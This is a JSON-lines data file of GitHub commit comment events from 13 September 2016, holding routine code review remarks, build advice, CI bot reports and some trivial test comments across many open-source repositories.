{"id":"4553984987","type":"CommitCommentEvent","actor":{"login":"davidecaroselli"},"repo":{"name":"ModernMT/MMT"},"payload":{"comment":{"id":18997323,"position":null,"line":null,"path":null,"commit_id":"d10e6c2e27a962d27162d16736abcee010002365","created_at":"2016-09-13T07:48:13Z","updated_at":"2016-09-13T07:48:13Z","body":"Hi @ugermann \r\nI verified the branch (**master**) and I had no problem in building and executing the base example, so I suspect that you have a partial rebuilt version of MMT. To be sure to have every library and code updated I suggest to:\r\n\r\n- remove everything inside `build/` folder.\r\n- be sure to have everything updates with `git pull origin master` and `git submodule init; git submodule update`.\r\n- follow the instruction in INSTALL.md to rebuild everything.\r\n\r\nCan you please make this test?\r\n\r\n- Davide"}},"created_at":"2016-09-13T07:48:13Z"}
{"id":"4553987891","type":"CommitCommentEvent","actor":{"login":"Faithcaio"},"repo":{"name":"CubeEngine/core"},"payload":{"comment":{"id":18997330,"position":5,"line":213,"path":"libcube/src/main/java/org/cubeengine/libcube/service/command/CubeCommandManager.java","commit_id":"cc1297e1f1e249df3ebeecb288516376b34e2f64","created_at":"2016-09-13T07:48:53Z","updated_at":"2016-09-13T07:48:53Z","body":"injecting the PluginContainer should be possible too, but i was too lazy ..."}},"created_at":"2016-09-13T07:48:53Z"}
{"id":"4553988032","type":"CommitCommentEvent","actor":{"login":"helloliang"},"repo":{"name":"helloliang/test"},"payload":{"comment":{"id":18997331,"position":null,"line":null,"path":null,"commit_id":"030faad412498f843cedc16387ddf616650f061a","created_at":"2016-09-13T07:48:55Z","updated_at":"2016-09-13T07:48:55Z","body":"1"}},"created_at":"2016-09-13T07:48:55Z"}
{"id":"4553992023","type":"CommitCommentEvent","actor":{"login":"pachiara"},"repo":{"name":"pachiara/pubblicalo_api"},"payload":{"comment":{"id":18997335,"position":null,"line":null,"path":null,"commit_id":"48a79b3d21ec767c69a665b2125257517272b62a","created_at":"2016-09-13T07:49:54Z","updated_at":"2016-09-13T07:49:54Z","body":"#1 aggiornamento rails 5"}},"created_at":"2016-09-13T07:49:54Z"}
{"id":"4553993140","type":"CommitCommentEvent","actor":{"login":"wimwinterberg"},"repo":{"name":"wearebuilders/Propel2"},"payload":{"comment":{"id":18997336,"position":null,"line":null,"path":null,"commit_id":"5d5825b61d2432dbb03467d08db71fb116bd8c63","created_at":"2016-09-13T07:50:13Z","updated_at":"2016-09-13T07:50:13Z","body":"Hi,\r\n\r\nCould you also alter the example usage? This change was really killing us :(\r\n\r\n```\r\n$query->filterByTitle('%fooValue%'); // WHERE title LIKE '%fooValue%'\r\n```"}},"created_at":"2016-09-13T07:50:13Z"}
{"id":"4553996310","type":"CommitCommentEvent","actor":{"login":"shinpeimuraoka"},"repo":{"name":"osrg/ryu"},"payload":{"comment":{"id":18997341,"position":17,"line":17,"path":"ryu/app/simple_switch_rest_13.py","commit_id":"5f521b50d66c5aeba838640bc1372a66013183ba","created_at":"2016-09-13T07:50:58Z","updated_at":"2016-09-13T07:50:58Z","body":"loggingのインポートを削除します。"}},"created_at":"2016-09-13T07:50:58Z"}
{"id":"4553998090","type":"CommitCommentEvent","actor":{"login":"ThomasKaiser"},"repo":{"name":"igorpecovnik/lib"},"payload":{"comment":{"id":18997343,"position":null,"line":null,"path":null,"commit_id":"195de287f2fe68baf510ce77b28b4a129aa4d24e","created_at":"2016-09-13T07:51:25Z","updated_at":"2016-09-13T07:51:25Z","body":"> Create a new patch for all config files, including new ones?\r\n\r\nI fear that's necessary. When we get feedback from Oliver Schinagl regarding Lime2 DRAM clockspeed and lowering the value really helps with stability I might take the time and try to convince Hans de Goede to rethink u-boot defaults for a variety of boards on linux-sunxi list.\r\n\r\nRegarding Ethernet: Nice but I hope that it doesn't delay booting (DHCP/PXE)? Our average H3 users seem to be interested in fast and featureless booting ;)"}},"created_at":"2016-09-13T07:51:25Z"}
{"id":"4553998230","type":"CommitCommentEvent","actor":{"login":"Ghostkeeper"},"repo":{"name":"Ultimaker/Cura"},"payload":{"comment":{"id":18997344,"position":null,"line":null,"path":null,"commit_id":"f81a5fe3017d37106ad3d96f26d152f151a7f133","created_at":"2016-09-13T07:51:28Z","updated_at":"2016-09-13T07:51:28Z","body":"When are we serialising a read-only container then?"}},"created_at":"2016-09-13T07:51:28Z"}
{"id":"4554005188","type":"CommitCommentEvent","actor":{"login":"shinpeimuraoka"},"repo":{"name":"osrg/ryu"},"payload":{"comment":{"id":18997360,"position":80,"line":80,"path":"ryu/app/simple_switch_rest_13.py","commit_id":"5f521b50d66c5aeba838640bc1372a66013183ba","created_at":"2016-09-13T07:53:09Z","updated_at":"2016-09-13T07:53:09Z","body":"いくつかの場所で使用されていますので、\r\n全てのsimpl_switch_spp をsimple_switch_appに修正します。"}},"created_at":"2016-09-13T07:53:09Z"}
{"id":"4554005608","type":"CommitCommentEvent","actor":{"login":"sajjadgolchin"},"repo":{"name":"sajjadgolchin/phpc7"},"payload":{"comment":{"id":18997362,"position":1,"line":1,"path":"index","commit_id":"5c7c36250221d3528db0b28e035cb51be4b156bc","created_at":"2016-09-13T07:53:15Z","updated_at":"2016-09-13T07:53:15Z","body":"ok test"}},"created_at":"2016-09-13T07:53:15Z"}
{"id":"4554005611","type":"CommitCommentEvent","actor":{"login":"mjibson"},"repo":{"name":"lib/pq"},"payload":{"comment":{"id":18997361,"position":17,"line":751,"path":"conn.go","commit_id":"57837c73d5c04cf0ebbfbd855251dc692559ce59","created_at":"2016-09-13T07:53:15Z","updated_at":"2016-09-13T07:53:15Z","body":"Ok."}},"created_at":"2016-09-13T07:53:15Z"}
{"id":"4554006840","type":"CommitCommentEvent","actor":{"login":"aswaterman"},"repo":{"name":"kito-cheng/riscv-binutils-gdb"},"payload":{"comment":{"id":18997364,"position":null,"line":null,"path":null,"commit_id":"64f1b5dfe90f4d0e264a9f13942aa29d2c8cb44e","created_at":"2016-09-13T07:53:31Z","updated_at":"2016-09-13T07:53:31Z","body":"thank _you_ :)"}},"created_at":"2016-09-13T07:53:31Z"}
{"id":"4554008895","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/OpenStudio"},"payload":{"comment":{"id":18997375,"position":null,"line":null,"path":null,"commit_id":"10b33afeec108e778c0a97e16a544cfc5377d3be","created_at":"2016-09-13T07:54:02Z","updated_at":"2016-09-13T07:54:02Z","body":"buildingunit (nmerket) - i386-Windows-7-VisualStudio-12: OK (2342 of 2451 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-10b33afeec108e778c0a97e16a544cfc5377d3be-i386-Windows-7-VisualStudio-12.html'>![Build Badge](http://img.shields.io/badge/build%20status-warnings-yellow.svg)</a> <a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-10b33afeec108e778c0a97e16a544cfc5377d3be-i386-Windows-7-VisualStudio-12.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-95.55%25-yellow.svg)</a> \n"}},"created_at":"2016-09-13T07:54:02Z"}
{"id":"4554010491","type":"CommitCommentEvent","actor":{"login":"sunset1215"},"repo":{"name":"sunset1215/rcs"},"payload":{"comment":{"id":18997380,"position":null,"line":null,"path":null,"commit_id":"9ff9337a7558b00c0c2fea26f3f507b0bb413539","created_at":"2016-09-13T07:54:24Z","updated_at":"2016-09-13T07:54:24Z","body":"@kwonn @bangwu93 \r\nIf you have pulled this, please acknowledge so that we can proceed to the next step. Many thanks."}},"created_at":"2016-09-13T07:54:24Z"}
{"id":"4554010591","type":"CommitCommentEvent","actor":{"login":"jenkins-plone-org"},"repo":{"name":"plone/plone.tiles"},"payload":{"comment":{"id":18997381,"position":null,"line":null,"path":null,"commit_id":"6703af7b70a152cbb9f821dcf29bd98eeab98624","created_at":"2016-09-13T07:54:25Z","updated_at":"2016-09-13T07:54:25Z","body":"@datakurre Jenkins CI reporting about code analysis\nSee the full report here: http://jenkins.plone.org/job/package-plone.tiles/49/violations\n```\nplone/tiles/__init__.py:0:1: I001 isort found changes, run it on the file\nplone/tiles/data.py:196:1: C901 'map_to_pairs' is too complex (12)\nplone/tiles/data.py:244:1: C901 'encode' is too complex (15)\nplone/tiles/data.py:325:1: C901 'decode' is too complex (13)\nplone/tiles/directives.py:0:1: I001 isort found changes, run it on the file\n```\nFollow [these instructions](https://github.com/plone/jenkins.plone.org/blob/master/docs/source/run-qa-on-package.rst) to reproduce it locally."}},"created_at":"2016-09-13T07:54:25Z"}
{"id":"4554010622","type":"CommitCommentEvent","actor":{"login":"madmoose"},"repo":{"name":"peterkohaut/scummvm"},"payload":{"comment":{"id":18997382,"position":null,"line":null,"path":null,"commit_id":"a51691ce37664fd8300a60206b5e7bd2b98e27f7","created_at":"2016-09-13T07:54:26Z","updated_at":"2016-09-13T07:54:26Z","body":"Wow! Awesome work :smiley: "}},"created_at":"2016-09-13T07:54:26Z"}
{"id":"4554010656","type":"CommitCommentEvent","actor":{"login":"Bauuuuu"},"repo":{"name":"Bauuuuu/android_kernel_zte_nx512j"},"payload":{"comment":{"id":18997383,"position":null,"line":null,"path":null,"commit_id":"9b5e164554bd6d697e3fffc3c271e086e1a1ba93","created_at":"2016-09-13T07:54:26Z","updated_at":"2016-09-13T07:54:26Z","body":"That is not only for power off alarm but in general a fix"}},"created_at":"2016-09-13T07:54:26Z"}
{"id":"4554010765","type":"CommitCommentEvent","actor":{"login":"vadimk2016"},"repo":{"name":"vadimk2016/python_docs"},"payload":{"comment":{"id":18997384,"position":3,"line":3,"path":"phonebook.py","commit_id":"f9af983f5302eafe3aa6aa8e1697f990b3e7d136","created_at":"2016-09-13T07:54:28Z","updated_at":"2016-09-13T07:54:28Z","body":"ee"}},"created_at":"2016-09-13T07:54:28Z"}
{"id":"4554012748","type":"CommitCommentEvent","actor":{"login":"Bauuuuu"},"repo":{"name":"Bauuuuu/android_device_zte_nx512j"},"payload":{"comment":{"id":18997386,"position":null,"line":null,"path":null,"commit_id":"c23bcfcf3a3d844f59b960de6886d331ba0109ea","created_at":"2016-09-13T07:54:57Z","updated_at":"2016-09-13T07:54:57Z","body":"we will cleanup for cm14 "}},"created_at":"2016-09-13T07:54:57Z"}
{"id":"4554013291","type":"CommitCommentEvent","actor":{"login":"icc"},"repo":{"name":"h5p/h5p-editor-php-library"},"payload":{"comment":{"id":18997387,"position":4,"line":9,"path":"language/en.js","commit_id":"8695c00d3f2ac1f1fd20875f304ba48cb866d4c2","created_at":"2016-09-13T07:55:03Z","updated_at":"2016-09-13T07:55:03Z","body":"@fnoks Why are we adding a new string instead of using the existing _requiredProperty_ translation?"}},"created_at":"2016-09-13T07:55:03Z"}
{"id":"4554015646","type":"CommitCommentEvent","actor":{"login":"frenzymadness"},"repo":{"name":"frenzymadness/content"},"payload":{"comment":{"id":18997393,"position":null,"line":null,"path":null,"commit_id":"aae2b999f9bd4ff11234eb5fc1de304b2e9c159b","created_at":"2016-09-13T07:55:37Z","updated_at":"2016-09-13T07:55:37Z","body":"@encukou @hroncok Guys, thank you for review. What do you think, is this content prepared to do PR?"}},"created_at":"2016-09-13T07:55:37Z"}
{"id":"4554016065","type":"CommitCommentEvent","actor":{"login":"jeromecoutant"},"repo":{"name":"ARMmbed/mbed-os"},"payload":{"comment":{"id":18997395,"position":8,"line":24,"path":"libraries/tests/mbed/can_loopback/main.cpp","commit_id":"d0e2f1efa6de02e1d522a025995d16f7b1de9edd","created_at":"2016-09-13T07:55:43Z","updated_at":"2016-09-13T07:55:43Z","body":"This can't compile... and TARGET_DISCO_F469NI and TARGET_DISCO_F746NG has been deleted ??"}},"created_at":"2016-09-13T07:55:43Z"}
{"id":"4554018780","type":"CommitCommentEvent","actor":{"login":"shinpeimuraoka"},"repo":{"name":"osrg/ryu"},"payload":{"comment":{"id":18997397,"position":82,"line":82,"path":"ryu/app/simple_switch_rest_13.py","commit_id":"5f521b50d66c5aeba838640bc1372a66013183ba","created_at":"2016-09-13T07:56:21Z","updated_at":"2016-09-13T07:56:21Z","body":"95行目も改行したほうが良さそうですのでご指摘の箇所と合わせて修正します。"}},"created_at":"2016-09-13T07:56:21Z"}
{"id":"4554021617","type":"CommitCommentEvent","actor":{"login":"Badiboy"},"repo":{"name":"PokemonGoMap/PokemonGo-Map"},"payload":{"comment":{"id":18997399,"position":null,"line":null,"path":null,"commit_id":"37536f1f455f6b467c4455f920c56ca92ed5ab82","created_at":"2016-09-13T07:57:03Z","updated_at":"2016-09-13T07:57:03Z","body":"* Updated url, added detection on banned proxies\r\nYou broke the proxy checking!!!\r\nAdd >>>>!\r\n\r\n            elif proxy_response.status_code == 403:\r\n                log.error(\"Proxy %s is banned - got status code: %s\", proxy[1], str(proxy_response.status_code))\r\n>>>                proxy_queue.task_done()\r\n                return False\r\n"}},"created_at":"2016-09-13T07:57:03Z"}
{"id":"4554023320","type":"CommitCommentEvent","actor":{"login":"pachiara"},"repo":{"name":"pachiara/alice"},"payload":{"comment":{"id":18997402,"position":null,"line":null,"path":null,"commit_id":"3ed9445404694d0c8da82250753bba890c32fced","created_at":"2016-09-13T07:57:30Z","updated_at":"2016-09-13T07:57:30Z","body":"#94 log"}},"created_at":"2016-09-13T07:57:30Z"}
{"id":"4554025653","type":"CommitCommentEvent","actor":{"login":"pachiara"},"repo":{"name":"pachiara/alice"},"payload":{"comment":{"id":18997407,"position":null,"line":null,"path":null,"commit_id":"ae9112a97570be3c8b59bc72c3412f712e018421","created_at":"2016-09-13T07:58:05Z","updated_at":"2016-09-13T07:58:05Z","body":"#94 log"}},"created_at":"2016-09-13T07:58:05Z"}
{"id":"4554028097","type":"CommitCommentEvent","actor":{"login":"pachiara"},"repo":{"name":"pachiara/alice"},"payload":{"comment":{"id":18997410,"position":null,"line":null,"path":null,"commit_id":"7c0b61d0040e66cdfbe1173cfca1d4447ab2a5be","created_at":"2016-09-13T07:58:36Z","updated_at":"2016-09-13T07:58:36Z","body":"#94 log"}},"created_at":"2016-09-13T07:58:36Z"}
{"id":"4554030219","type":"CommitCommentEvent","actor":{"login":"shoheis"},"repo":{"name":"YoshinoriSaito/ysaitoprogram"},"payload":{"comment":{"id":18997412,"position":9,"line":9,"path":"160913insrt.php","commit_id":"424a2cf94d72dbcdac459d148b1b918894b3d670","created_at":"2016-09-13T07:59:04Z","updated_at":"2016-09-13T07:59:04Z","body":"> 次はDB作成へチャレンジした方がよろしいでしょうか？\r\nそうですね。お願いいたします！\r\n本当はSELECTもと思いましたが、次のIssueからの掲示板サービスの作成過程の中でもでてきますので、そこで取り組みましょう。"}},"created_at":"2016-09-13T07:59:04Z"}
{"id":"4554033001","type":"CommitCommentEvent","actor":{"login":"JamesCullum"},"repo":{"name":"antigloss/go"},"payload":{"comment":{"id":18997413,"position":null,"line":null,"path":null,"commit_id":"246be9c619517216ebff72a92c48d71ef722ad9b","created_at":"2016-09-13T07:59:41Z","updated_at":"2016-09-13T07:59:41Z","body":"This assumes that every gProgname contains backslashes. As this is only the case for the \"go run\" command, this will break \"go build\" files. You should check first what environment its running on."}},"created_at":"2016-09-13T07:59:41Z"}
{"id":"4554035548","type":"CommitCommentEvent","actor":{"login":"pachiara"},"repo":{"name":"pachiara/alice"},"payload":{"comment":{"id":18997419,"position":null,"line":null,"path":null,"commit_id":"5bda8d7aa54aca97808923d95a60de37476ac4e9","created_at":"2016-09-13T08:00:19Z","updated_at":"2016-09-13T08:00:19Z","body":"#94 profilazione"}},"created_at":"2016-09-13T08:00:19Z"}
{"id":"4554039260","type":"CommitCommentEvent","actor":{"login":"amigrave"},"repo":{"name":"odoo-dev/odoo"},"payload":{"comment":{"id":18997424,"position":null,"line":null,"path":null,"commit_id":"4105756dee796a2bd9c21a57f2e2c26d2bcb99bd","created_at":"2016-09-13T08:01:06Z","updated_at":"2016-09-13T08:01:06Z","body":"@dreispt This commit does not reflect the code of the effective merge so I will comment on this on instead: 75f60f69416625713819c810d2da33db4dc0b06c"}},"created_at":"2016-09-13T08:01:06Z"}
{"id":"4554039867","type":"CommitCommentEvent","actor":{"login":"gauravkumar28"},"repo":{"name":"gauravkumar28/codearjun"},"payload":{"comment":{"id":18997426,"position":null,"line":null,"path":null,"commit_id":"40f0e0271e6300ab75fcb68b94c90baa3cfbbc40","created_at":"2016-09-13T08:01:14Z","updated_at":"2016-09-13T08:01:14Z","body":"abcdefghij\r\nghijabcdef"}},"created_at":"2016-09-13T08:01:14Z"}
{"id":"4554040462","type":"CommitCommentEvent","actor":{"login":"DavyLandman"},"repo":{"name":"usethesource/rascal-feature"},"payload":{"comment":{"id":18997428,"position":null,"line":null,"path":null,"commit_id":"7d33e479f5d843f0c6718b7d202105a52d1611ed","created_at":"2016-09-13T08:01:21Z","updated_at":"2016-09-13T08:01:21Z","body":"this repo has been moved inside the rascal-eclipse repo. @msteindorfer I think we should delete this repo?"}},"created_at":"2016-09-13T08:01:21Z"}
{"id":"4554041247","type":"CommitCommentEvent","actor":{"login":"amigrave"},"repo":{"name":"odoo/odoo"},"payload":{"comment":{"id":18997430,"position":null,"line":null,"path":null,"commit_id":"75f60f69416625713819c810d2da33db4dc0b06c","created_at":"2016-09-13T08:01:31Z","updated_at":"2016-09-13T08:01:31Z","body":"@dreispt Here's the answer of your question asked on the commit 4105756dee796a2bd9c21a57f2e2c26d2bcb99bd which was one commit in the feature branch and not the final commit of merge.\r\n\r\n> You should mention that the t-elif and t-else directives are only supported on the js client-side implementation, and not in the Python server-side one.\r\n\r\n`t-else` support has been added to qweb python by @Gorash some time ago and we are looking to add support for `t-elif` as well in qweb python for consistency sake. \r\n\r\n> Don't you need a t-endif? Is the end automatic on the next t-if block?\r\n\r\nNo because the `t-elif` and `t-else` nodes should be exclusively preceded by a `t-if` or `t-elif` node. This is [checked in the preprocessor](https://github.com/odoo/odoo/commit/75f60f69416625713819c810d2da33db4dc0b06c#diff-b44b6dfe24cfd50006b02a8f7307632cR309)\r\n\r\n> The tests should include a second t-if t-else group to confirm this.\r\n\r\n[The tests I added](https://github.com/odoo/odoo/commit/75f60f69416625713819c810d2da33db4dc0b06c#diff-cdcffb3db6ca11e90488b9f946372dc2R19) are currently disabled because they are shared with qweb python and the `t-elif` support is not yet done in the python implementation. But will do as soon as it is the case.\r\n\r\n> Are else block limited to siblings under the same HTML element?\r\n\r\nYes ! The extra conditional branching (`t-elif` and `t-else`) are naturally linked to their previous sibling `t-if`:\r\n\r\n```html\r\n<t t-if=\"condition1\">\r\n   foo\r\n</t>\r\n<t t-if=\"condition2\">\r\n   bar\r\n</t>\r\n<t t-elif=\"condition3\">\r\n   baz\r\n</t>\r\n<t t-else=\"\">\r\n   qux\r\n</t>\r\n```\r\n\r\nwould translate to\r\n\r\n```javascript\r\nif (condition1) {\r\n   foo\r\n}\r\nif (condition2) {\r\n   bar\r\n} else if (condition3) {\r\n   baz\r\n} else {\r\n   qux\r\n}\r\n```"}},"created_at":"2016-09-13T08:01:31Z"}
{"id":"4554041553","type":"CommitCommentEvent","actor":{"login":"juanpablo-munoz"},"repo":{"name":"eduborgono/prueba"},"payload":{"comment":{"id":18997431,"position":null,"line":null,"path":null,"commit_id":"3cf437e6c3338631a5e77e0694fa74eb5dc39243","created_at":"2016-09-13T08:01:36Z","updated_at":"2016-09-13T08:01:36Z","body":"ola men"}},"created_at":"2016-09-13T08:01:36Z"}
{"id":"4554046868","type":"CommitCommentEvent","actor":{"login":"brinxmat"},"repo":{"name":"digibib/ls.ext"},"payload":{"comment":{"id":18997445,"position":6,"line":106,"path":"redef/services/src/test/resources/BS_external_with_work_raw_mapping.json","commit_id":"bad5be132b7a3a0ba9b9dffdf6def73635862f28","created_at":"2016-09-13T08:02:50Z","updated_at":"2016-09-13T08:02:50Z","body":"http://data.deichman.no/illustrativeMatter#kol. ill. ?! This looks fun."}},"created_at":"2016-09-13T08:02:50Z"}
{"id":"4554047183","type":"CommitCommentEvent","actor":{"login":"icc"},"repo":{"name":"h5p/h5p-editor-php-library"},"payload":{"comment":{"id":18997447,"position":5,"line":47,"path":"scripts/h5peditor-select.js","commit_id":"8a35ece2af1979a17f861de7732ff2af788202e2","created_at":"2016-09-13T08:02:55Z","updated_at":"2016-09-13T08:02:55Z","body":"The _optional_ property is optional and can, therefore, be either _true_, _false_ or _undefined_. \r\nChecking for _false_ will not work when the property is _undefined_ but `if (!this.field.optional && ...` will."}},"created_at":"2016-09-13T08:02:55Z"}
{"id":"4554050685","type":"CommitCommentEvent","actor":{"login":"psychon"},"repo":{"name":"jprellberg/angular-apt"},"payload":{"comment":{"id":18997452,"position":73,"line":148,"path":"src/main/java/api/modules/ModuleRunner.java","commit_id":"8f010cf51e9a1df058c043ee051e2729847e9648","created_at":"2016-09-13T08:03:44Z","updated_at":"2016-09-13T08:03:44Z","body":"For your information: In the end (...lots of code to follow), this just calls `Thread#interrupt()` on the thread that executes the above `Callable` and `Thread#interrupt()` doesn't usually have much effect on running APT modules. Still, I guess this is the best we can do. I just wanted to say that this \"Abort task\" sounds stronger than it really is.\r\n\r\nThe details:\r\n- `Executors.newCachedThreadPool()` creates a `ThreadPoolExecutor`.\r\n- It's `submit(Callable)`-Method is inherited from `AbstractExecutorService`.\r\n- This is implemented by wrapping the callable into an `java.util.concurrent.FutureTask`.\r\n- Its `get(long, TimeUnit)` is implemented... well, yeah, it works here correctly.\r\n- However, [FutureTask.cancel()](http://grepcode.com/file/repository.grepcode.com/java/root/jdk/openjdk/7-b147/java/util/concurrent/FutureTask.java#FutureTask.cancel%28boolean%29) just forwards to a [method that uses `Thread#interrupt()`](http://grepcode.com/file/repository.grepcode.com/java/root/jdk/openjdk/7-b147/java/util/concurrent/FutureTask.java#FutureTask.Sync.innerCancel%28boolean%29)."}},"created_at":"2016-09-13T08:03:44Z"}
{"id":"4554053063","type":"CommitCommentEvent","actor":{"login":"ohagendorf"},"repo":{"name":"ARMmbed/mbed-os"},"payload":{"comment":{"id":18997456,"position":8,"line":24,"path":"libraries/tests/mbed/can_loopback/main.cpp","commit_id":"d0e2f1efa6de02e1d522a025995d16f7b1de9edd","created_at":"2016-09-13T08:04:20Z","updated_at":"2016-09-13T08:04:20Z","body":"My mistake, I'm very sorry. I send a PR."}},"created_at":"2016-09-13T08:04:20Z"}
{"id":"4554053550","type":"CommitCommentEvent","actor":{"login":"pachiara"},"repo":{"name":"pachiara/alice"},"payload":{"comment":{"id":18997460,"position":null,"line":null,"path":null,"commit_id":"d8adc31f167dac9f4cb812a0ce29638f1fdb6caa","created_at":"2016-09-13T08:04:27Z","updated_at":"2016-09-13T08:04:27Z","body":"#94 profilazione"}},"created_at":"2016-09-13T08:04:27Z"}
{"id":"4554055597","type":"CommitCommentEvent","actor":{"login":"pachiara"},"repo":{"name":"pachiara/alice"},"payload":{"comment":{"id":18997467,"position":null,"line":null,"path":null,"commit_id":"04b67fd4d373e66dd0d269355566349a977f9cb0","created_at":"2016-09-13T08:04:49Z","updated_at":"2016-09-13T08:04:49Z","body":"#94 profilazione"}},"created_at":"2016-09-13T08:04:49Z"}
{"id":"4554059115","type":"CommitCommentEvent","actor":{"login":"pachiara"},"repo":{"name":"pachiara/alice"},"payload":{"comment":{"id":18997475,"position":null,"line":null,"path":null,"commit_id":"4d9236b35e67d0bd04278bf724f75840926f17af","created_at":"2016-09-13T08:05:36Z","updated_at":"2016-09-13T08:05:36Z","body":"#94 profilazione"}},"created_at":"2016-09-13T08:05:36Z"}
{"id":"4554063456","type":"CommitCommentEvent","actor":{"login":"IgorNaprienko"},"repo":{"name":"IgorNaprienko/Lesson3"},"payload":{"comment":{"id":18997484,"position":null,"line":null,"path":null,"commit_id":"633793cd25f5215d893d0e92a868a832dfb0250a","created_at":"2016-09-13T08:06:33Z","updated_at":"2016-09-13T08:06:33Z","body":"jk"}},"created_at":"2016-09-13T08:06:33Z"}
{"id":"4554067162","type":"CommitCommentEvent","actor":{"login":"icc"},"repo":{"name":"h5p/h5p-editor-php-library"},"payload":{"comment":{"id":18997494,"position":null,"line":null,"path":null,"commit_id":"59f14677dcb68568a263cb0803150458d0e5cabf","created_at":"2016-09-13T08:07:24Z","updated_at":"2016-09-13T08:07:24Z","body":"Be aware that adding _isOptional()_ to the API is the only reason we will need to bump the core minor version for this release. Are we sure that we wish to introduce this to the API now? \r\nAdditionally, it will not be consistent with the other editor widgets."}},"created_at":"2016-09-13T08:07:24Z"}
{"id":"4554067848","type":"CommitCommentEvent","actor":{"login":"mariohahn"},"repo":{"name":"Movile/StatusProvider"},"payload":{"comment":{"id":18997496,"position":null,"line":null,"path":null,"commit_id":"c7a795a1858cb3afdaedf604a50160d97856a6fe","created_at":"2016-09-13T08:07:34Z","updated_at":"2016-09-13T08:07:34Z","body":"that literally makes no sense (: centerX and centerY is useless in your code now."}},"created_at":"2016-09-13T08:07:34Z"}
{"id":"4554068559","type":"CommitCommentEvent","actor":{"login":"nckhang"},"repo":{"name":"fullers/moviepicker"},"payload":{"comment":{"id":18997499,"position":null,"line":null,"path":null,"commit_id":"390e46fc97bf579afa96b8d19e4cd94539520a9e","created_at":"2016-09-13T08:07:46Z","updated_at":"2016-09-13T08:07:46Z","body":"Changes made:\r\n\r\n- #16: Added modal window\r\n- Added modal messages:\r\n> - Loading\r\n> - Can't compare the same movie!\r\n\r\n- Make sure you can't search for same movie twice\r\n- Removed unnecessary Tingle js/css files and Modal.js file"}},"created_at":"2016-09-13T08:07:46Z"}
{"id":"4554069945","type":"CommitCommentEvent","actor":{"login":"kristom"},"repo":{"name":"digibib/ls.ext"},"payload":{"comment":{"id":18997503,"position":6,"line":106,"path":"redef/services/src/test/resources/BS_external_with_work_raw_mapping.json","commit_id":"bad5be132b7a3a0ba9b9dffdf6def73635862f28","created_at":"2016-09-13T08:08:07Z","updated_at":"2016-09-13T08:08:07Z","body":"Ja, og det er fikset i bad5be132b7a3a0ba9b9dffdf6def73635862f28\r\n"}},"created_at":"2016-09-13T08:08:07Z"}
{"id":"4554070876","type":"CommitCommentEvent","actor":{"login":"Jojo-Schmitz"},"repo":{"name":"IsaacWeiss/MuseScore"},"payload":{"comment":{"id":18997504,"position":null,"line":null,"path":null,"commit_id":"c18a8c6931c312d2da854a023cd64c184f9881c2","created_at":"2016-09-13T08:08:19Z","updated_at":"2016-09-13T08:08:19Z","body":"The translation part is missing, instrumentsxml.h"}},"created_at":"2016-09-13T08:08:19Z"}
{"id":"4554071673","type":"CommitCommentEvent","actor":{"login":"lazka"},"repo":{"name":"quodlibet/quodlibet"},"payload":{"comment":{"id":18997508,"position":null,"line":null,"path":null,"commit_id":"9d5d71b012ee4db9b676f6738198ccd7987a9c6a","created_at":"2016-09-13T08:08:32Z","updated_at":"2016-09-13T08:08:32Z","body":":)"}},"created_at":"2016-09-13T08:08:32Z"}
{"id":"4554073662","type":"CommitCommentEvent","actor":{"login":"GuoguangLan"},"repo":{"name":"apache/thrift"},"payload":{"comment":{"id":18997511,"position":null,"line":null,"path":null,"commit_id":"8252577ec9da25f027b9edfa6876f9d9a0094566","created_at":"2016-09-13T08:09:01Z","updated_at":"2016-09-13T08:09:01Z","body":"@nsuke [https://github.com/apache/thrift/commit/8252577ec9da25f027b9edfa6876f9d9a0094566](url)\r\nuse #elif _SUNPRO_CC will be better,\r\nThank you."}},"created_at":"2016-09-13T08:09:01Z"}
{"id":"4554079871","type":"CommitCommentEvent","actor":{"login":"dericed"},"repo":{"name":"MediaArea/MediaConch_SourceCode"},"payload":{"comment":{"id":18997527,"position":9,"line":9,"path":"Source/Resource/policies/sample_policy_4_mkv_ffv1_digitization.xml","commit_id":"610e84f368f874d59907d29ab3f85df28a67c7cb","created_at":"2016-09-13T08:10:30Z","updated_at":"2016-09-13T08:10:30Z","body":"this doesn't work (yet) since the namespace is only added to `extra` and not `ErrorDetectionType`"}},"created_at":"2016-09-13T08:10:30Z"}
{"id":"4554080437","type":"CommitCommentEvent","actor":{"login":"IgorNaprienko"},"repo":{"name":"IgorNaprienko/Lesson3"},"payload":{"comment":{"id":18997530,"position":null,"line":null,"path":null,"commit_id":"25e98a2012f6593ee39d317ea8bca8e985d7df08","created_at":"2016-09-13T08:10:38Z","updated_at":"2016-09-13T08:10:38Z","body":"jk"}},"created_at":"2016-09-13T08:10:38Z"}
{"id":"4554084297","type":"CommitCommentEvent","actor":{"login":"tonio155"},"repo":{"name":"tonio155/Travelly_WDI_Project_3"},"payload":{"comment":{"id":18997539,"position":null,"line":null,"path":null,"commit_id":"40fd0ee844edb1c5b4d9c1785920976483397e84","created_at":"2016-09-13T08:11:35Z","updated_at":"2016-09-13T08:11:35Z","body":"<a href=\"https:&#x2F;&#x2F;trello.com&#x2F;c&#x2F;U7YrEBTo&#x2F;65-shortlist-the-skyscanner-results-with-sabre\"><img src=\"https:&#x2F;&#x2F;github.trello.services&#x2F;images&#x2F;trello-icon.png\" width=\"12\" height=\"12\"> Shortlist the SkyScanner results with Sabre</a>"}},"created_at":"2016-09-13T08:11:35Z"}
{"id":"4554084445","type":"CommitCommentEvent","actor":{"login":"jangxyz"},"repo":{"name":"snailzzang/bookocr"},"payload":{"comment":{"id":18997540,"position":null,"line":null,"path":null,"commit_id":"33435d07d4f9a8ed492d1fd7a4b908b248e98e8a","created_at":"2016-09-13T08:11:37Z","updated_at":"2016-09-13T08:11:37Z","body":"for #65 "}},"created_at":"2016-09-13T08:11:37Z"}
{"id":"4554084803","type":"CommitCommentEvent","actor":{"login":"sunmingsheng"},"repo":{"name":"sunmingsheng/learngit"},"payload":{"comment":{"id":18997541,"position":null,"line":null,"path":null,"commit_id":"b36928625bf29ec6e2c20ee7232e99ae835a2022","created_at":"2016-09-13T08:11:43Z","updated_at":"2016-09-13T08:11:43Z","body":"sdasda"}},"created_at":"2016-09-13T08:11:43Z"}
